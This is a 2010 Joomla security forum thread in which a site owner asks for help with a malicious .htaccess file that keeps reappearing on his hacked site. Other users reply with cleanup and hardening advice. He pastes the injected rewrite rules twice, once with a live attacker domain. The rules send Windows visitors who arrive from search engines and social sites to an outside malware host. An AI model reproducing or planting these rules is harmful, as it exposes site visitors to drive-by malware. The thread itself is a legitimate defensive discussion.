Htaccess being re-writen yet with permission set to 644

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
User avatar
mwongzie
Joomla! Intern
Joomla! Intern
Posts: 50
Joined: Tue Nov 20, 2007 5:20 am
Location: NC Raleigh
Contact:

Htaccess being re-writen yet with permission set to 644

Post by mwongzie » Mon May 17, 2010 12:28 pm

I have a site running Version 1.5.14, and my htaccess files is being re-written by some script I assume with the latest being something like

Code: Select all

#
# DO NOT EDIT THIS FILE!
#
ErrorDocument 500 http://ns2.{mod deleted}/main.php?i=JcitjdAYrPKmjBjyXsVBypEZ&e=0
ErrorDocument 502 http://ns2.{mod deleted}/main.php?i=JcitjdAYrPKmjBjyXsVBypEZ&e=2
ErrorDocument 403 http://ns2.{mod deleted}/main.php?i=JcitjdAYrPKmjBjyXsVBypEZ&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns2.{mod deleted}/main.php?e=r&h=%{HTTP_HOST}&i=JcitjdAYrPKmjBjyXsVBypEZ [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns2.{mod deleted}/main.php?e=4&h=%{HTTP_HOST}&i=JcitjdAYrPKmjBjyXsVBypEZ [R,L]

I have checked throughout the forum and I cannot seem to get anyone with an answer. any help?
Last edited by mandville on Mon May 17, 2010 1:51 pm, edited 1 time in total.
Reason: break link to prevent spam juice
Mark Mwongela
Manager and Web Developer
Verviant Consulting Services
Web, Software and Mobile Development
Joomla, Wordpress, .NET , PHP, Iphone, Blackberry Development
http://www.verviant.com , http://www.verviant.com/portfolio

User avatar
Per Yngve Berg
Joomla! Master
Joomla! Master
Posts: 25770
Joined: Mon Oct 27, 2008 9:27 pm
Location: Akershus, Norway

Re: Htaccess being re-writen yet with permission set to 644

Post by Per Yngve Berg » Mon May 17, 2010 1:47 pm

Have you talked to your host provider? Maybe they are distributing the file.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14781
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Htaccess being re-writen yet with permission set to 644

Post by mandville » Mon May 17, 2010 1:52 pm

is this just a part of your htaccess file or all of it?
did you check the change log and see when it happened and then the raw logs to see who /how it was modified
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
fw116
Joomla! Ace
Joomla! Ace
Posts: 1365
Joined: Tue Sep 06, 2005 11:18 am
Location: Germany

Re: Htaccess being re-writen yet with permission set to 644

Post by fw116 » Mon May 17, 2010 3:27 pm

mwongzie wrote:I have a site running Version 1.5.14, and my htaccess files is being re-written by some script I assume with the latest being something like
I have checked throughout the forum and I cannot seem to get anyone with an answer. any help?
well,
because of the (in bold) version number, i think you've been cracked...

so delete everything, grab a backup and install it, UPDATE and u are done...

Skiprr
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Thu May 20, 2010 3:22 pm

Re: Htaccess being re-writen yet with permission set to 644

Post by Skiprr » Thu May 20, 2010 4:35 pm

fw116 wrote:
mwongzie wrote:I have a site running Version 1.5.14, and my htaccess files is being re-written by some script I assume with the latest being something like
I have checked throughout the forum and I cannot seem to get anyone with an answer. any help?
well,
because of the (in bold) version number, i think you've been cracked...

so delete everything, grab a backup and install it, UPDATE and u are done...
Just a note that staying up-to-date with the current version of Joomla is an important security element, but it is by far not the only precaution needed. Changing the Joomla core will seldom make up for poorly-written add-ons, a weakly configured server structure, old or poorly-configured PHP versions, inadequately protected SQL tables, having critical files like Joomla's configuration.php in Web-readable directories, JavaScript or Perl that is vulnerable to XSS attacks, etc.

I'm just chiming in so that folks realize there is more work to do than making sure the current version of Joomla is running.

maryjones5
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Thu May 20, 2010 11:33 pm

Re: Htaccess being re-writen yet with permission set to 644

Post by maryjones5 » Thu May 20, 2010 11:35 pm

im having this same issue
Last edited by mandville on Thu May 20, 2010 11:50 pm, edited 1 time in total.
Reason: signature against forum rules http://forum.joomla.org/viewtopic.php?f=8&t=65

User avatar
MikeHell
Joomla! Apprentice
Joomla! Apprentice
Posts: 43
Joined: Tue Mar 13, 2007 12:52 am
Contact:

Re: Htaccess being re-writen yet with permission set to 644

Post by MikeHell » Sat May 22, 2010 4:09 pm

Please have a look at this for more info on these latest Htaccess attacks:
http://blog.unmaskparasites.com/2010/05 ... new-trend/

For anyone currently hosted on Godaddy [ or Network Solutions ] you seriously need to find a new host as fast as you can:
http://smackdown.blogsblogsblogs.com/20 ... -decision/

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14781
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Htaccess being re-writen yet with permission set to 644

Post by mandville » Sat May 22, 2010 5:31 pm

HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
mwongzie
Joomla! Intern
Joomla! Intern
Posts: 50
Joined: Tue Nov 20, 2007 5:20 am
Location: NC Raleigh
Contact:

Re: Htaccess being re-writen yet with permission set to 644

Post by mwongzie » Wed May 26, 2010 3:53 pm

Now this is even more intriguing. The hacker (In this case assuming its not a script or virus that Infected my server) has managed to write an .htaccess file in the root (before public_html folder) with the following code. I have upgraded everything, I just hadnt changed my FTP passwords (which I have now) The .htacess file had

Code: Select all

ErrorDocument 500 http://ww.vailconstruction.net/main.php?i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=0
ErrorDocument 502 http://ww.vailconstruction.net/main.php?i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=2
ErrorDocument 403 http://ww.vailconstruction.net/main.php?i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ww.vailconstruction.net/main.php?h=%{HTTP_HOST}&i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=r [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ww.vailconstruction.net/main.php?h=%{HTTP_HOST}&i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=4 [R,L]
I have backed up upgraded and restored, now keenly watching for anything funny. If anyone hears anything worth sharing, please do

Thanks
Mark Mwongela
Manager and Web Developer
Verviant Consulting Services
Web, Software and Mobile Development
Joomla, Wordpress, .NET , PHP, Iphone, Blackberry Development
http://www.verviant.com , http://www.verviant.com/portfolio


Locked

Return to “Security in Joomla! 1.5”